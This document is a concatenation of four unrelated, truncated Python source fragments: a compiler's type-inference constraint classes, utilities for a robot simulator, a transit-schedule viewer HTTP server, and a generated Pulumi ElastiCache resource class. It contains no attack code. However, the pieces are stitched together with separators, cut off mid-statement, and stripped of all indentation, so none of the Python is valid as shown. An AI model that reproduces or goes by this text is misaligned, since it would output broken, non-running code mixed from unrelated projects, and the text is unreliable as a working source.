oset = typevars[self.target]
for tp in typevars[self.pair.name].get():
if not isinstance(tp, types.Pair):
# XXX is this an error?
continue
oset.add_types(tp.first_type)
class PairSecondConstrain(object):
def __init__(self, target, pair, loc):
self.target = target
self.pair = pair
self.loc = loc
def __call__(self, context, typevars):
oset = typevars[self.target]
for tp in typevars[self.pair.name].get():
if not isinstance(tp, types.Pair):
# XXX is this an error?
continue
oset.add_types(tp.second_type)
class StaticGetItemConstrain(object):
def __init__(self, target, value, index, loc):
self.target = target
self.value = value
self.index = index
self.loc = loc
def __call__(self, context, typevars):
oset = typevars[self.target]
for tp in typevars[self.value.name].get():
if isinstance(tp, types.UniTuple):
oset.add_types(tp.dtype)
elif isinstance(tp, types.Tuple):
oset.add_types(tp.types[self.index])
class CallConstrain(object):
"""Constrain for calling functions.
Perform case analysis foreach combinations of argument types.
"""
def __init__(self, target, func, args, kws, loc):
self.target = target
self.func = func
self.args = args
self.kws = kws
self.loc = loc
def __call__(self, context, typevars):
fnty = typevars[self.func].getone()
self.resolve(context, typevars, fnty)
def resolve(self, context, typevars, fnty):
assert not self.kws, "Keyword argument is not supported, yet"
assert fnty
argtypes = [typevars[a.name].get() for a in self.args]
restypes = []
# Case analysis for each combination of argument types.
for args in itertools.product(*argtypes):
# TODO handling keyword arguments
sig = context.resolve_function_type(fnty, args, ())
if sig is None:
msg = "Undeclared %s%s" % (fnty, args)
raise TypingError(msg, loc=self.loc)
restypes.append(sig.return_type)
typevars[self.target].add_types(*restypes)
class IntrinsicCallConstrain(CallConstrain):
def __call__(self, context, typevars):
self.resolve(context, typevars, fnty=self.func)
class GetAttrConstrain(object):
def __init__(self, target, attr, value, loc, inst):
self.target = target
self.attr = attr
self.value = value
self.loc = loc
self.inst = inst
def __call__(self, context, typevars):
valtys = typevars[self.value.name].get()
restypes = []
for ty in valtys:
try:
attrty = context.resolve_getattr(value=ty, attr=self.attr)
except KeyError:
args = (self.attr, ty, self.value.name, self.inst)
msg = "Unknown attribute '%s' for %s %s %s" % args
raise TypingError(msg, loc=self.inst.loc)
else:
assert attrty
restypes.append(attrty)
typevars[self.target].add_types(*restypes)
def __repr__(self):
return 'resolving type of attribute "{attr}" of "{value}"'.format(
value=self.value, attr=self.attr)
class SetItemConstrain(object):
def __init__(self, target, index, value, loc):
self.target = target
self.index = index
self.value = value
self.loc = loc
def __call__(self, context, typevars):
targettys = typevars[self.target.name].get()
idxtys = typevars[self.index.name].get()
valtys = typevars[self.value.name].get()
for ty, it, vt in itertools.product(targettys, idxtys, valtys):
if not context.resolve_setitem(target=ty, index=it, value=vt):
raise TypingError("Cannot resolve setitem: %s[%s] = %s" %
(ty, it, vt), loc=self.loc)
class SetAttrConstrain(object):
def __init__(self, target, attr, value, loc):
self.target = target
self.attr = attr
self.value = value
self.loc = loc
def __call__(self, context, typevars):
targettys = typevars[self.target.name].get()
valtys = typevars[self.value.name].get()
for ty, vt in itertools.product(targettys, valtys):
if not context.resolve_setattr(target=ty, attr=self.attr,
value=vt):
raise TypingError("Cannot resolve setattr: (%s).%s = %s" %
(ty, self.attr, vt), loc=self.loc)
class TypeVarMap(dict):
def set_context(self, context):
self.context = context
def __getitem__(self, name):
if name not in self:
self[name] = TypeVar(self.context, name)
return super(TypeVarMap, self).__getitem__(name)
def __setitem__(self, name, value):
assert isinstance(name, str)
if name in self:
raise KeyError("Cannot redefine typevar %s" % name)
else:
super(TypeVarMap, self).__setitem__(name, value)
class TypeInferer(object):
"""
Operates on block that shares the same ir.Scope.
"""
def __init__(self, context, blocks):
self.context = context
self.blocks = blocks
self.typevars = TypeVarMap()
self.typevars.set_context(context)
self.constrains = ConstrainNetwork()
self.return_type = None
# Set of assumed immutable globals
self.assumed_immutables = set()
# Track all calls
self.usercalls = []
self.intrcalls = []
self.setitemcalls = []
self.setattrcalls = []
def dump(self):
print('---- type variables ----')
pprint(list(six.itervalues(self.typevars)))
def seed_type(self, name, typ):
"""All arguments should be seeded.
"""
self.typevars[name].lock(typ)
def seed_return(self, typ):
"""Seeding of return value is optional.
"""
for blk in utils.itervalues(self.blocks):
inst = blk.terminator
if isinstance(inst, ir.Return):
self.typevars[inst.value.name].lock(typ)
def build_constrain(self):
for blk in utils.itervalues(self.blocks):
for inst in blk.body:
self.constrain_statement(inst)
def propagate(self):
newtoken = self.get_state_token()
oldtoken = None
if config.DEBUG:
self.dump()
# Since the number of types are finite, the typesets will eventually
# stop growing.
while newtoken != oldtoken:
if config.DEBUG:
print("propagate".center(80, '-'))
oldtoken = newtoken
self.constrains.propagate(self.context, self.typevars)
newtoken = self.get_state_token()
if config.DEBUG:
self.dump()
def unify(self):
typdict = utils.UniqueDict()
for var, tv in self.typevars.items():
if len(tv) == 1:
unified = tv.getone()
elif len(tv) == 0:
raise TypeError("Variable %s has no type" % var)
else:
unified = self.context.unify_types(*tv.get())
if unified == types.pyobject:
raise TypingError("Var '%s' unified to object: %s" % (var, tv))
typdict[var] = unified
retty = self.get_return_type(typdict)
fntys = self.get_function_types(typdict)
return typdict, retty, fntys
def get_function_types(self, typemap):
calltypes = utils.UniqueDict()
for call, args, kws in self.intrcalls:
if call.op in ('inplace_binop', 'binop', 'unary'):
fnty = call.fn
else:
fnty = call.op
args = tuple(typemap[a.name] for a in args)
assert not kws
signature = self.context.resolve_function_type(fnty, args, ())
assert signature is not None, (fnty, args)
calltypes[call] = signature
for call, args, kws in self.usercalls:
args = tuple(typemap[a.name] for a in args)
if isinstance(call.func, ir.Intrinsic):
signature = call.func.type
else:
assert not kws
fnty = typemap[call.func.name]
signature = self.context.resolve_function_type(fnty, args, ())
assert signature is not None, (fnty, args)
calltypes[call] = signature
for inst in self.setitemcalls:
target = typemap[inst.target.name]
index = typemap[inst.index.name]
value = typemap[inst.value.name]
signature = self.context.resolve_setitem(target, index, value)
calltypes[inst] = signature
for inst in self.setattrcalls:
target = typemap[inst.target.name]
attr = inst.attr
value = typemap[inst.value.name]
signature = self.context.resolve_setattr(target, attr, value)
calltypes[inst] = signature
return calltypes
def get_return_type(self, typemap):
rettypes = set()
for blk in utils.itervalues(self.blocks):
term = blk.terminator
if isinstance(term, ir.Return):
rettypes.add(typemap[term.value.name])
if types.none in rettypes:
# Special case None return
rettypes = rettypes - set([types.none])
if rettypes:
unified = self.context.unify_types(*rettypes)
return types.Optional(unified)
else:
| |
#!/usr/bin/env python
""" Utility module. All auxiliary functions go here.
This module provides internal functionalities for everything else, aside from
handling the internal details of running the simulation itself. There is a
plethora of varied functions, so it's best left alone unless strictly necessary.
Do not modify this module unless you know exactly what you are doing.
This program is free software: you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation, either version 3 of the License, or (at your option) any later
version.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
this program. If not, see <http://www.gnu.org/licenses/>.
"""
__author__ = "<NAME>"
__authors__ = ["<NAME>"]
__contact__ = "<EMAIL>"
__copyright__ = "Copyright 2019, UAH"
__credits__ = ["<NAME>"]
__date__ = "2019/03/29"
__deprecated__ = False
__email__ = "<EMAIL>"
__license__ = "GPLv3"
__maintainer__ = "<NAME>"
__status__ = "Development"
__version__ = "0.0.2"
from PIL import Image, ImageDraw, ImageColor
import numpy as np
import pygame
from scipy import ndimage as filters
from matplotlib.pyplot import imshow
from scipy.stats import norm
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib.widgets import Button
import matplotlib as mpl
import time
import math
import json
import copy
from robot import Robot
import controller
from controllers.controllers import get_controllers
start_time = time.time()
last_call = time.time()
frames = 0
delta = 0
pressed = []
labels = []
co2_center = (0, 0)
scale = 1
grid_size = []
ax = None
frozen_dist = None
fig = None
npdata = None
gui = True
show_robot = True
button = None
showFPS = False
run = True
screen = None
clock = None
def switch_show_robot(dummy):
"""
Helper function that controls whether the robot should be displayed and updated.
Mainly created as a callback for buttons to use, can be called before the
simulation starts in order to get the corresponding button to show up.
It requires a single positional argument due to Matplotlib constraints.
"""
global show_robot
show_robot = not show_robot
def press(event):
"""Helper function that handles key presses. Must be registered to a plot."""
global pressed
pressed.append(event.key)
def calculate_delta():
"""
Helper function that calculates the delta value for any given update call.
Necessary in order for the update to be performed somewhat smoothly.
"""
'''global last_call
new_call = time.time()
delta = new_call - last_call
last_call = new_call
return delta'''
global clock, delta
delta = clock.tick(30)
return delta
def generate_dist(size = 1):
global frozen_dist, scale
scale = 1/size
norm.stats(scale=scale)
frozen_dist = norm()
def get_reading(x, y):
global frozen_dist
if frozen_dist is None:
generate_dist(1000)
distance = np.linalg.norm((co2_center[0] - x, co2_center[1] - y))
return frozen_dist.pdf(distance*scale)
def create_controllers():
"""
Driver function to abstract the process of instancing a Controller object
using factories.
Inputs:
- No input, everything comes from the config global variable
Outputs:
- a fully configured Controller object or a list of Controllers, depending on the config
"""
global npdata
if 'class' in config or 'controllers' in config:
return get_controllers(config)
else:
raise KeyError("The configuration file received doesn't contain a \"class\" attribute")
def create_robot(json_file = '../conf/robot.json', controller = None):
"""
Uses a json file to generate a fully configured Robot object.
Inputs:
- json_file: path to the JSON configuration file for the robot in question.
- controller: pre-configured Controller object.
Outputs:
- fully configured Robot object.
"""
with open(json_file, 'r') as fp:
f = json.load(fp)
if 'name' in f:
r = Robot(identifier = f['id'], x = f['x'], y = f['y'],\
orientation = f['orientation'],\
vision_range = (f['sonar_range'][0], f['sonar_range'][1]),\
sensors = f['sonars'],\
radius = f['radius'], max_speed = f['max_speed'], controller=controller,
name=f['name'])
else:
r = Robot(identifier = f['id'], x = f['x'], y = f['y'],\
orientation = f['orientation'],\
vision_range = (f['sonar_range'][0], f['sonar_range'][1]),\
sensors = f['sonars'],\
radius = f['radius'], max_speed = f['max_speed'], controller=controller)
if 'battery' in f:
r.insert_battery_details(f['step'], f['battery'], f['charging_rate'],
f['movement_cost'], f['reading_cost'],
f['picture_cost'], f['generic_cost'])
if 'color' in f:
r.set_color(f['color'])
return r
def init_globals_from_config():
"""
Initialize all global variables based on config
TODO: Remove global variables and keep only the config dict, to at some point remove it too and pass it as reference if needed
"""
showFPS = 'fps' in config
gui = config['gui']
co2_center = config['co2_center'] if 'co2_center' in config else (0, 0)
def create_robots(controllers):
"""
Returns a list of robots or one robot depending on the config
(TBC, Pedro) Why did we do a deepcopy of the controller config only when we received 1 controler, but not when multiple?
If this is still a requirement, we need to add it to the r.append line
"""
if type(config['robot']) is list:
r = []
for i, path in enumerate(config['robot']):
if i >= len(controllers):
r.append(create_robot(path, controllers[0]))
else:
r.append(create_robot(path, controllers[i]))
else:
r = create_robot(config['robot'], controllers[0])
return r
def load_simulation(config_mgr):
"""
Loads a simulation using a configuration file. For the time being, it limits itself to loading the corresponding map and robot.
Inputs:
- json_file: path to the configuration file describing the simulation to be loaded. This configuration file must be a JSON
containing the following:
* stage: string defining the path to the image file that represents the stage to be loaded.
* robot: string defining the path to the configuration file of the robot that will be used.
"""
global gui, npdata, co2_center, showFPS, config
# Load the config in the global variable
config = config_mgr.get_config()
# Init global variables based on config dict
# TODO: I think we should refactor everything to only use config as global (Pedro)
init_globals_from_config()
# Load the image used in the stage
npdata = load_image(config['stage'])
# Get the controller if only one or a list of controllers
controllers = create_controllers()
if 'co2_radius' in config:
generate_dist(config['co2_radius'])
robots = create_robots(controllers)
display_image(robots)
def update_loop(robots, npdata):
global delta, pressed, run
while run:
init_time = time.time()
if gui:
delta = calculate_delta()
else:
delta = 0.1
for r in robots:
r.update(npdata, delta, True)
pressed.clear()
time.sleep(1/80)
def update(robots, npdata):
delta = calculate_delta()/1000
for r in robots:
r.update(npdata, delta, True)
def animate(robots):
"""
Update function. Updates internal world data, then prints it to a plot.
Must be registered to said plot.
"""
global start_time, frames, delta, show_robot, screen, clock, grid_size
if show_robot:
for r in robots:
r.get_lock().acquire()
if r.controller.has_cur_detected_edge_list():
'''for e in r.controller.detected_edges:
pygame.draw.circle(screen, r.color, (int(e[0]), int(e[1])), 1)'''
for a in r.controller.actual_sensor_angles:
dstX = r.x + np.cos(np.radians(a)) * r.controller.cur_detected_edges_distances[r.controller.actual_sensor_angles.index(a)]
dstY = r.y + np.sin(np.radians(a)) * r.controller.cur_detected_edges_distances[r.controller.actual_sensor_angles.index(a)]
pygame.draw.line(screen, (255, 0, 255), (int(r.x), int(r.y)), (int(dstX), int(dstY)), 1)
for e in r.controller.cur_detected_edges:
pygame.draw.circle(screen, (0, 255, 0), (int(e[0]), int(e[1])), int((100/np.linalg.norm((e[0]-r.x, e[1]-r.y)))/90))
if type(r.color) is str:
r.color = list(mpl.colors.to_rgb(mpl.colors.get_named_colors_mapping()[r.color]))
r.color[0] *= 255
r.color[1] *= 255
r.color[2] *= 255
r.color = tuple(r.color)
pygame.draw.circle(screen, r.color, (int(r.x), int(r.y)), int(r.radius))
dstX = r.x + np.cos(np.radians(r.orientation)) * 2 * r.radius
dstY = r.y + np.sin(np.radians(r.orientation)) * 2 * r.radius
pygame.draw.line(screen, r.color, (int(r.x), int(r.y)), (int(dstX), int(dstY)), 1)
r.get_lock().release()
end_time = time.time()
frames += 1
if (end_time - start_time) >= 1:
if showFPS:
print("FPS: ", clock.get_fps())
start_time = time.time()
frames = 0
def load_image(infilename):
"""
Helper function that loads an image in black and white, then returns it as an nparray.
"""
img = Image.open(infilename).convert("L")
img.load()
data = np.asarray(img, dtype="int32")
return data
def handle_close(evt):
global run
run = False
def display_image(r):
"""
Driver function that starts the simulation, after being provided an image to use as stage.
"""
global screen, npdata, show_robot, clock, labels, co2_center
img = Image.fromarray(np.asarray(np.clip(npdata,0,255), dtype="uint8"), "L")
img = img.convert("RGB")
robots = []
if type(r) is list:
robots = r
else:
robots.append(r)
for robot in robots:
if robot.controller.goal_oriented():
robot.set_position(robot.controller.goal[0][0], robot.controller.goal[0][1])
npdata = np.rot90(npdata)
npdata = np.flipud(npdata)
if gui:
pygame.init()
pygame.display.set_caption("R2P2")
clock = pygame.time.Clock()
size = img.size
img = pygame.image.fromstring(img.tobytes("raw", 'RGB'), size, 'RGB')
screen = pygame.display.set_mode(size)
font = pygame.font.SysFont("BitstreamVeraSans Roman", 23)
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
return
if event.type == pygame.KEYDOWN:
press(event)
if event.type == pygame.KEYUP:
if event.key in pressed:
pressed.remove(event.key)
update(robots, npdata)
screen.fill((0, 0, 0))
screen.blit(img, (0, 0))
if grid_size:
grid_color = (150, 150, 150)
font_size = round((grid_size[0]+grid_size[1]) // 2)
if font_size > min(grid_size):
font_size = int(min(grid_size))
label_font = pygame.font.SysFont("BitstreamVeraSans Roman", font_size)
tolerance = 12
offset_x = round(grid_size[0]/2)
offset_y | |
#!/usr/bin/python2.5
# Copyright (C) 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
An example application that uses the transitfeed module.
You must provide a Google Maps API key.
"""
from __future__ import print_function
import BaseHTTPServer, sys, urlparse
import bisect
from gtfsscheduleviewer.marey_graph import MareyGraph
import gtfsscheduleviewer
import mimetypes
import os.path
import re
import signal
import json as simplejson
import socket
import time
import transitfeed
from transitfeed import util
import urllib
# By default Windows kills Python with Ctrl+Break. Instead make Ctrl+Break
# raise a KeyboardInterrupt.
if hasattr(signal, 'SIGBREAK'):
signal.signal(signal.SIGBREAK, signal.default_int_handler)
mimetypes.add_type('text/plain', '.vbs')
class ResultEncoder(simplejson.JSONEncoder):
def default(self, obj):
try:
iterable = iter(obj)
except TypeError:
pass
else:
return list(iterable)
return simplejson.JSONEncoder.default(self, obj)
# Code taken from
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/425210/index_txt
# An alternate approach is shown at
# http://mail.python.org/pipermail/python-list/2003-July/212751.html
# but it requires multiple threads. A sqlite object can only be used from one
# thread.
class StoppableHTTPServer(BaseHTTPServer.HTTPServer):
def server_bind(self):
BaseHTTPServer.HTTPServer.server_bind(self)
self.socket.settimeout(1)
self._run = True
def get_request(self):
while self._run:
try:
sock, addr = self.socket.accept()
sock.settimeout(None)
return (sock, addr)
except socket.timeout:
pass
def stop(self):
self._run = False
def serve(self):
while self._run:
self.handle_request()
def StopToTuple(stop):
"""Return tuple as expected by javascript function addStopMarkerFromList"""
return (stop.stop_id, stop.stop_name, float(stop.stop_lat),
float(stop.stop_lon), stop.location_type)
class ScheduleRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
scheme, host, path, x, params, fragment = urlparse.urlparse(self.path)
parsed_params = {}
for k in params.split('&'):
k = urllib.unquote(k)
if '=' in k:
k, v = k.split('=', 1)
parsed_params[k] = unicode(v, 'utf8')
else:
parsed_params[k] = ''
if path == '/':
return self.handle_GET_home()
m = re.match(r'/json/([a-z]{1,64})', path)
if m:
handler_name = 'handle_json_GET_%s' % m.group(1)
handler = getattr(self, handler_name, None)
if callable(handler):
return self.handle_json_wrapper_GET(handler, parsed_params)
# Restrict allowable file names to prevent relative path attacks etc
m = re.match(r'/file/([a-z0-9_-]{1,64}\.?[a-z0-9_-]{1,64})$', path)
if m and m.group(1):
try:
f, mime_type = self.OpenFile(m.group(1))
return self.handle_static_file_GET(f, mime_type)
except IOError as e:
print("Error: unable to open %s" % m.group(1))
# Ignore and treat as 404
m = re.match(r'/([a-z]{1,64})', path)
if m:
handler_name = 'handle_GET_%s' % m.group(1)
handler = getattr(self, handler_name, None)
if callable(handler):
return handler(parsed_params)
return self.handle_GET_default(parsed_params, path)
def OpenFile(self, filename):
"""Try to open filename in the static files directory of this server.
Return a tuple (file object, string mime_type) or raise an exception."""
(mime_type, encoding) = mimetypes.guess_type(filename)
assert mime_type
# A crude guess of when we should use binary mode. Without it non-unix
# platforms may corrupt binary files.
if mime_type.startswith('text/'):
mode = 'r'
else:
mode = 'rb'
return open(os.path.join(self.server.file_dir, filename), mode), mime_type
def handle_GET_default(self, parsed_params, path):
self.send_error(404)
def handle_static_file_GET(self, fh, mime_type):
content = fh.read()
self.send_response(200)
self.send_header('Content-Type', mime_type)
self.send_header('Content-Length', str(len(content)))
self.end_headers()
self.wfile.write(content)
def AllowEditMode(self):
return False
def handle_GET_home(self):
schedule = self.server.schedule
(min_lat, min_lon, max_lat, max_lon) = schedule.GetStopBoundingBox()
forbid_editing = ('true', 'false')[self.AllowEditMode()]
agency = ', '.join(a.agency_name for a in schedule.GetAgencyList()).encode('utf-8')
key = self.server.key
host = self.server.host
# A very simple template system. For a fixed set of values replace [xxx]
# with the value of local variable xxx
f, _ = self.OpenFile('index.html')
content = f.read()
for v in ('agency', 'min_lat', 'min_lon', 'max_lat', 'max_lon', 'key',
'host', 'forbid_editing'):
content = content.replace('[%s]' % v, str(locals()[v]))
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Content-Length', str(len(content)))
self.end_headers()
self.wfile.write(content)
def handle_json_GET_routepatterns(self, params):
"""Given a route_id generate a list of patterns of the route. For each
pattern include some basic information and a few sample trips."""
schedule = self.server.schedule
route = schedule.GetRoute(params.get('route', None))
if not route:
self.send_error(404)
return
time = int(params.get('time', 0))
date = params.get('date', "")
sample_size = 3 # For each pattern return the start time for this many trips
pattern_id_trip_dict = route.GetPatternIdTripDict()
patterns = []
for pattern_id, trips in pattern_id_trip_dict.items():
time_stops = trips[0].GetTimeStops()
if not time_stops:
continue
has_non_zero_trip_type = False;
# Iterating over a copy so we can remove from trips inside the loop
trips_with_service = []
for trip in trips:
service_id = trip.service_id
service_period = schedule.GetServicePeriod(service_id)
if date and not service_period.IsActiveOn(date):
continue
trips_with_service.append(trip)
if trip['trip_type'] and trip['trip_type'] != '0':
has_non_zero_trip_type = True
# We're only interested in the trips that do run on the specified date
trips = trips_with_service
name = u'%s to %s, %d stops' % (time_stops[0][2].stop_name, time_stops[-1][2].stop_name, len(time_stops))
transitfeed.SortListOfTripByTime(trips)
num_trips = len(trips)
if num_trips <= sample_size:
start_sample_index = 0
num_after_sample = 0
else:
# Will return sample_size trips that start after the 'time' param.
# Linear search because I couldn't find a built-in way to do a binary
# search with a custom key.
start_sample_index = len(trips)
for i, trip in enumerate(trips):
if trip.GetStartTime() >= time:
start_sample_index = i
break
num_after_sample = num_trips - (start_sample_index + sample_size)
if num_after_sample < 0:
# Less than sample_size trips start after 'time' so return all the
# last sample_size trips.
num_after_sample = 0
start_sample_index = num_trips - sample_size
sample = []
for t in trips[start_sample_index:start_sample_index + sample_size]:
sample.append( (t.GetStartTime(), t.trip_id) )
patterns.append((name, pattern_id, start_sample_index, sample,
num_after_sample, (0,1)[has_non_zero_trip_type]))
patterns.sort()
return patterns
def handle_json_wrapper_GET(self, handler, parsed_params):
"""Call handler and output the return value in JSON."""
schedule = self.server.schedule
result = handler(parsed_params)
content = ResultEncoder().encode(result)
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.send_header('Content-Length', str(len(content)))
self.end_headers()
self.wfile.write(content)
def handle_json_GET_routes(self, params):
"""Return a list of all routes."""
schedule = self.server.schedule
result = []
for r in schedule.GetRouteList():
result.append( (r.route_id, r.route_short_name, r.route_long_name) )
result.sort(key = lambda x: x[1:3])
return result
def handle_json_GET_routerow(self, params):
schedule = self.server.schedule
route = schedule.GetRoute(params.get('route', None))
return [transitfeed.Route._FIELD_NAMES, route.GetFieldValuesTuple()]
def handle_json_GET_triprows(self, params):
"""Return a list of rows from the feed file that are related to this
trip."""
schedule = self.server.schedule
try:
trip = schedule.GetTrip(params.get('trip', None))
except KeyError:
# if a non-existent trip is searched for, the return nothing
return
route = schedule.GetRoute(trip.route_id)
trip_row = dict(trip.iteritems())
route_row = dict(route.iteritems())
return [['trips.txt', trip_row], ['routes.txt', route_row]]
def handle_json_GET_tripstoptimes(self, params):
schedule = self.server.schedule
try:
trip = schedule.GetTrip(params.get('trip'))
except KeyError:
# if a non-existent trip is searched for, the return nothing
return
time_stops = trip.GetTimeStops()
stops = []
arrival_times = []
departure_times = []
for arr,dep,stop in time_stops:
stops.append(StopToTuple(stop))
arrival_times.append(arr)
departure_times.append(dep)
return [stops, arrival_times, departure_times]
def handle_json_GET_tripshape(self, params):
schedule = self.server.schedule
try:
trip = schedule.GetTrip(params.get('trip'))
except KeyError:
# if a non-existent trip is searched for, the return nothing
return
points = []
if trip.shape_id:
shape = schedule.GetShape(trip.shape_id)
for (lat, lon, dist) in shape.points:
points.append((lat, lon))
else:
time_stops = trip.GetTimeStops()
for arr,dep,stop in time_stops:
points.append((stop.stop_lat, stop.stop_lon))
route = schedule.GetRoute(trip.route_id)
polyline_data = {'points': points}
if route.route_color:
polyline_data['color'] = '#' + route.route_color
return polyline_data
def handle_json_GET_neareststops(self, params):
"""Return a list of the nearest 'limit' stops to 'lat', 'lon'"""
schedule = self.server.schedule
lat = float(params.get('lat'))
lon = float(params.get('lon'))
limit = int(params.get('limit'))
stops = schedule.GetNearestStops(lat=lat, lon=lon, n=limit)
return [StopToTuple(s) for s in stops]
def handle_json_GET_boundboxstops(self, params):
"""Return a list of up to 'limit' stops within bounding box with 'n','e'
and 's','w' in the NE and SW corners. Does not handle boxes crossing
longitude line 180."""
schedule = self.server.schedule
n = float(params.get('n'))
e = float(params.get('e'))
s = float(params.get('s'))
w = float(params.get('w'))
limit = int(params.get('limit'))
stops = schedule.GetStopsInBoundingBox(north=n, east=e, south=s, west=w, n=limit)
return [StopToTuple(s) for s in stops]
def handle_json_GET_stopsearch(self, params):
schedule = self.server.schedule
query = params.get('q', None).lower()
matches = []
for s in schedule.GetStopList():
if s.stop_id.lower().find(query) != -1 or s.stop_name.lower().find(query) != -1:
matches.append(StopToTuple(s))
return matches
def handle_json_GET_stoptrips(self, params):
"""Given a stop_id and time in seconds since midnight return the next
trips to visit the stop."""
schedule = self.server.schedule
stop = schedule.GetStop(params.get('stop', None))
time = int(params.get('time', 0))
date = params.get('date', "")
time_trips = stop.GetStopTimeTrips(schedule)
time_trips.sort() # OPT: use bisect.insort to make this O(N*ln(N)) -> O(N)
# Keep the first 5 after param 'time'.
# Need make a tuple to find correct bisect point
time_trips = time_trips[bisect.bisect_left(time_trips, (time, 0)):]
time_trips = time_trips[:5]
# TODO: combine times for a route to show next 2 departure times
result = []
for time, (trip, index), tp in time_trips:
service_id = trip.service_id
service_period = schedule.GetServicePeriod(service_id)
| |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import pulumi
import pulumi.runtime
class ReplicationGroup(pulumi.CustomResource):
"""
Provides an ElastiCache Replication Group resource.
For working with Memcached or single primary Redis instances (Cluster Mode Disabled), see the
[`aws_elasticache_cluster` resource](/docs/providers/aws/r/elasticache_cluster.html).
"""
def __init__(__self__, __name__, __opts__=None, apply_immediately=None, at_rest_encryption_enabled=None, auth_token=None, auto_minor_version_upgrade=None, automatic_failover_enabled=None, availability_zones=None, cluster_mode=None, engine=None, engine_version=None, maintenance_window=None, node_type=None, notification_topic_arn=None, number_cache_clusters=None, parameter_group_name=None, port=None, replication_group_description=None, replication_group_id=None, security_group_ids=None, security_group_names=None, snapshot_arns=None, snapshot_name=None, snapshot_retention_limit=None, snapshot_window=None, subnet_group_name=None, tags=None, transit_encryption_enabled=None):
"""Create a ReplicationGroup resource with the given unique name, props, and options."""
if not __name__:
raise TypeError('Missing resource name argument (for URN creation)')
if not isinstance(__name__, basestring):
raise TypeError('Expected resource name to be a string')
if __opts__ and not isinstance(__opts__, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
__props__ = dict()
if apply_immediately and not isinstance(apply_immediately, bool):
raise TypeError('Expected property apply_immediately to be a bool')
__self__.apply_immediately = apply_immediately
"""
Specifies whether any modifications are applied immediately, or during the next maintenance window. Default is `false`.
"""
__props__['applyImmediately'] = apply_immediately
if at_rest_encryption_enabled and not isinstance(at_rest_encryption_enabled, bool):
raise TypeError('Expected property at_rest_encryption_enabled to be a bool')
__self__.at_rest_encryption_enabled = at_rest_encryption_enabled
"""
Whether to enable encryption at rest.
"""
__props__['atRestEncryptionEnabled'] = at_rest_encryption_enabled
if auth_token and not isinstance(auth_token, basestring):
raise TypeError('Expected property auth_token to be a basestring')
__self__.auth_token = auth_token
"""
The password used to access a password protected server. Can be specified only if `transit_encryption_enabled = true`.
"""
__props__['authToken'] = auth_token
if auto_minor_version_upgrade and not isinstance(auto_minor_version_upgrade, bool):
raise TypeError('Expected property auto_minor_version_upgrade to be a bool')
__self__.auto_minor_version_upgrade = auto_minor_version_upgrade
"""
Specifies whether a minor engine upgrades will be applied automatically to the underlying Cache Cluster instances during the maintenance window. Defaults to `true`.
"""
__props__['autoMinorVersionUpgrade'] = auto_minor_version_upgrade
if automatic_failover_enabled and not isinstance(automatic_failover_enabled, bool):
raise TypeError('Expected property automatic_failover_enabled to be a bool')
__self__.automatic_failover_enabled = automatic_failover_enabled
"""
Specifies whether a read-only replica will be automatically promoted to read/write primary if the existing primary fails. If true, Multi-AZ is enabled for this replication group. If false, Multi-AZ is disabled for this replication group. Must be enabled for Redis (cluster mode enabled) replication groups. Defaults to `false`.
"""
__props__['automaticFailoverEnabled'] = automatic_failover_enabled
if availability_zones and not isinstance(availability_zones, list):
raise TypeError('Expected property availability_zones to be a list')
__self__.availability_zones = availability_zones
"""
A list of EC2 availability zones in which the replication group's cache clusters will be created. The order of the availability zones in the list is not important.
"""
__props__['availabilityZones'] = availability_zones
if cluster_mode and not isinstance(cluster_mode, dict):
raise TypeError('Expected property cluster_mode to be a dict')
__self__.cluster_mode = cluster_mode
"""
Create a native redis cluster. `automatic_failover_enabled` must be set to true. Cluster Mode documented below. Only 1 `cluster_mode` block is allowed.
"""
__props__['clusterMode'] = cluster_mode
if engine and not isinstance(engine, basestring):
raise TypeError('Expected property engine to be a basestring')
__self__.engine = engine
"""
The name of the cache engine to be used for the clusters in this replication group. e.g. `redis`
"""
__props__['engine'] = engine
if engine_version and not isinstance(engine_version, basestring):
raise TypeError('Expected property engine_version to be a basestring')
__self__.engine_version = engine_version
"""
The version number of the cache engine to be used for the cache clusters in this replication group.
"""
__props__['engineVersion'] = engine_version
if maintenance_window and not isinstance(maintenance_window, basestring):
raise TypeError('Expected property maintenance_window to be a basestring')
__self__.maintenance_window = maintenance_window
"""
Specifies the weekly time range for when maintenance
on the cache cluster is performed. The format is `ddd:hh24:mi-ddd:hh24:mi` (24H Clock UTC).
The minimum maintenance window is a 60 minute period. Example: `sun:05:00-sun:09:00`
"""
__props__['maintenanceWindow'] = maintenance_window
if node_type and not isinstance(node_type, basestring):
raise TypeError('Expected property node_type to be a basestring')
__self__.node_type = node_type
"""
The compute and memory capacity of the nodes in the node group.
"""
__props__['nodeType'] = node_type
if notification_topic_arn and not isinstance(notification_topic_arn, basestring):
raise TypeError('Expected property notification_topic_arn to be a basestring')
__self__.notification_topic_arn = notification_topic_arn
"""
An Amazon Resource Name (ARN) of an
SNS topic to send ElastiCache notifications to. Example:
`arn:aws:sns:us-east-1:012345678999:my_sns_topic`
"""
__props__['notificationTopicArn'] = notification_topic_arn
if number_cache_clusters and not isinstance(number_cache_clusters, int):
raise TypeError('Expected property number_cache_clusters to be a int')
__self__.number_cache_clusters = number_cache_clusters
"""
